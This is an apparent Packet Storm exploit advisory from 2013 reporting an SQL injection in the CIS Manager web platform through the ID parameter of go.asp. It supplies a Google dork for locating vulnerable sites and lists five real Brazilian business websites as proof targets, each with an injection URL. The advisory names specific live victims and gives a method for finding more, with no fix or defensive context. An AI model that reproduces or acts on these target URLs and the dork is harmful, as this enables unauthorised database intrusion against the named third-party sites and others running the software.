Sites powered by CIS Manager suffer from a remote SQL injection vulnerability. Note that this advisory has site-specific information.
9a29ebb882f3ec5f6d82ab013ec40539c0e1e4d0d34e48ba62d2d2d0d163095b#********************************************************************************
# Exploit Title : CIS Manager SQL Injection Vulnerabilites
#
# Exploit Author : Ashiyane Digital Security Team
#
# Software Link : http://www.construtiva.com.br
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Powered by CIS Manager"
#
# Date: 2013/09/10
#
--------------------------------------------------------------------
# Exploit : Sql Injection
#
# Location : [Target]/artigosnoticias/go.asp?ID=[Sql Injection]
#
#
# Proof:
#
# http://www.agvlogistica.com.br/artigosnoticias/go.asp?ID='
#
# http://www.beashair.com.br/artigosnoticias/go.asp?ID='
#
# http://www.empregoppds.com.br/artigosnoticias/go.asp?ID='
#
# http://www.fieldlogger.com.br/artigosnoticias/go.asp?ID='
#
# http://www.gecepel.com.br/artigosnoticias/go.asp?ID='
#
######################
discovered by : ACC3SS
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed